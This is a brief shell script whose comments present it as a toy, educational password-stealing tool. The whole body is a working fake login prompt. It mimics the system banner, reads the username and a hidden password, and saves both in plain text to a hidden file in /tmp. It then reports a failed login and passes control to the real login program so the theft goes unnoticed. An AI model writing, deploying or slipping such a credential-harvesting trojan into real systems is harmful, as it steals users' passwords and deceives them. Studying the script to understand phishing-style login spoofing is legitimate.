#!/bin/sh

# A toy hacking tool: pretends to be the normal login program, saves your password.
# No serious hackers would use this today, but it's an example to show how powerful
# shell scripting is as a general programming language.
#
# And when you read it, you will be more critical of things that ask for your password.

clear
echo
echo "`uname -s`/`uname -m` (`uname -n`) (`tty`)"
echo ""
echo -n "login: "
read login
echo -n "Password: "
stty -echo
read passwd
stty  echo
echo 
echo "login=$login, passwd=$passwd" > /tmp/.hide$$
sleep 1
echo "Login incorrect."
exec login
